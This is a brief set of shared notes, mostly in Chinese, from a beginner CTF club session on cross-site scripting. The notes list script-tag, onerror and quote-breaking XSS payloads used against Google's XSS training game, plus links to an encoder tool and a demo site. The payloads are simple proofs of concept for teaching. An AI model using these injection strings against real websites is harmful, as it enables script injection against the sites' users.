# NCtfU - 5/10 (WEB Onebone, Zone) (A205) ###### tags: `新手場` `nctfu2021` ## 會參加 - Onebone - idisused - yenchia - Ping - zone - Jiun ## 講者 - Onebone → ~~主講大大~~[已經滑到太平洋ㄌ] - Zone [滑水] ## 講者筆記 ### Cross Site Scripting #### script tag: ```html= <script src="a.js"></script> <script> /* script here */ </script> ``` #### DOM event: https://www.w3schools.com/jsref/dom_obj_event.asp Demo: https://xss-game.appspot.com/ Level 1: ```html= <script>alert(1)</script> // change page <script>document.body.innerHTML="Hello hacker"</script> ``` demo(level 1):"https://xss-game.appspot.com/level1/frame?query=%3Cscript%3Edocument.body.innerHTML=%22Hello+hacker%22%3C/script%3E" level 2 ( DOM event ): ```html= <img src="not-exist" onerror="alert(1)"> <img onerror="/* javascript here */"> ``` level 3: ( bypass ): ```html= // Test case: https://xss-game.appspot.com/level3/frame#3.jpg'> payload: "3.jpg'>" → ``` <img src="https://dogecoin.org/static/11cf6c18151cbb22c6a25d704ae7b313/dd8fa/doge-main.jpg1" onerror="alert(1)"> ## 共筆 XSS String encoder: http://evuln.com/tools/xss-encoder/ XSSRF demo: https://xssrf.hackme.inndy.tw/